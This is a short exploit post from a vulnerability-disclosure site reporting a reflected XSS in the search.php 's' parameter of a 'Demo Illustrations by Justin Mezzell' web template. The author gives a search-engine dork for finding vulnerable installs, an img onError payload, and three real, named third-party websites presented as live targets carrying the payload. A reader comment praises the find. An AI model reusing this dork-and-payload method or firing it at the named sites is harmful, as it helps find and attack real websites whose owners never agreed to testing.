Demo Illustrations by Justin Mezzell reflected XSS

2019.06.16
dz ABDO10 (DZ) dz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# [+] Title : Demo Illustrations by Justin Mezzell reflected XSS # [+] Author (Discover) : ABDO10 # [+] Date : Jun, 16th 2019 # [+] Dork : allintext:"Demo Illustrations by Justin Mezzell" # [+] Poc Instructions : + We have to dork in search engine + we have to set payload on the vulnerable file "search.php" in the parameter "s" + E.g [target]/[path]/search.php?s=<img src="xy" onError=prompt(document.domain)> # [+] Alive E.g : + http://www.plasticosajaco.com/search.php?s=<img src="xy" onError=prompt(document.domain)> + https://nokesolutions.com/samples/codester/search.php?s=<img src="xy" onError=prompt(document.domain)> + http://schoolnepal.org/search.php?s=<img src="xy" onError=prompt(document.domain)> ``... and more ... This the real hacking #ahmed cmd`` `` Greetz Lakarha_Family ``


Vote for this issue:
100%
0%

Comment it here.
dj3bb4ran0n | Date: 2019-06-16 18:56 CET+1
nice catch keep it up you should try bug hunting platforms

Copyright 2025, cxsecurity.com

 

Back to Top